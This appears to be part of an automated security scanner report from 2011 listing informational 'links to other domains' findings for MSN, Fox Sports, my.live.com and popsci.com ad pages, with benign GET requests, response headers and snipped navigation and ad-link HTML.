http://www.ticketsnow.com/mlb-tickets/
http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068
http://www.ticketsnow.com/nba-tickets/
http://www.ticketsnow.com/nba-tickets/?partnerCode=16068
http://www.ticketsnow.com/nhl-tickets/
http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068
http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068
http://www.tvg.com/special/FoxSportsJumpPage_final.htm
http://www.whatifsports.com/
http://www.yardbarker.com/rumors
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /video?from=en-us_msnhp HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 210513
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=31
Date: Sat, 29 Jan 2011 23:49:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/component/cssjs/VideoCSS" />

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">

                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">

                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate & Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty & Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor & Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love & Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps & Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections & Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<h3><a href="http://www.ticketexchangebyticketmaster.com/NFL/default.aspx" title="NFL Tickets" target="_blank">NFL Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/mlb-tickets/" title="MLB Tickets" target="_blank">MLB Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/nba-tickets/" title="NBA Tickets" target="_blank">NBA Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/nhl-tickets/" title="NHL Tickets" target="_blank">NHL Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/college-football-tickets/" title="NCAA FB Tickets" target="_blank">NCAA FB Tickets</a>
...[SNIP]...
<h3><a title="Tickets" href="http://www.ticketsnow.com/" target="_blank">Tickets</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.242. http://my.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.live.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://my.live.com/?add=

The response contains the following link to another domain:

http://my.redacted/

Request

GET /?add= HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S:WEBA02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://my.redacted
Set-Cookie: mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=my.live.com; path=/
Set-Cookie: lastMarket=en-us; domain=.live.com; path=/
Set-Cookie: lastMktPath=en/us; domain=.live.com; path=/
Set-Cookie: frm=true; domain=.live.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.redacted">here</a>.</h2>
</body></html>

22.243. http://my.redacted/addtomymsn.armx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.redacted
Path:	/addtomymsn.armx

Issue detail

The page was loaded from a URL containing a query string:

http://my.redacted/addtomymsn.armx?id=rss&ut=

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353820&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014

Request

GET /addtomymsn.armx?id=rss&ut= HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:17:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353820&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014
Cache-Control: no-cache
ETag: "9d2255aeb787cb1:7c6"
Last-Modified: Fri, 19 Nov 2010 07:02:08 GMT
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353820&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.redacted%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014">here</a>
...[SNIP]...

22.244. http://my.redacted/addtomymsn.armx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.redacted
Path:	/addtomymsn.armx

Issue detail

The page was loaded from a URL containing a query string:

http://my.redacted/addtomymsn.armx?id=rss&ut=

The response contains the following link to another domain:

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410787&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014

Request

GET /addtomymsn.armx?id=rss&ut= HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 18:06:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN05
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410787&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014
Cache-Control: no-cache
ETag: "9d2255aeb787cb1:7c6"
Last-Modified: Fri, 19 Nov 2010 07:02:08 GMT
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410787&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.redacted%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc03049.popsci.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The page was loaded from a URL containing a query string:

http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05?

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;ord=16016899?
http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;ord=866922241?
http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;ord=283638657?
http://ad.doubleclick.net/ad/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;ord=973660255?
http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.2;sz=300x250;ord=395977082?
http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.4;sz=300x250;ord=1120588389?
http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.8;sz=88x31;ord=905700210?
http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968;sz=728x90;ord=2054956119?
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/16016899/Right1/WorldPub/PSC_AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?;ord=16016899?
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?
http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?
http://ad.doubleclick.net/adj/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/973660255/Bottom/WorldPub/PSC_CSX_Home_Geo_728x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?;ord=973660255?
http://imagec14.247realmedia.com/RealMedia/ads/Creatives/WorldPub/PSC_HouseCirc_ROS_205x94/psc_205x90_house.gif/1277498109
http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0
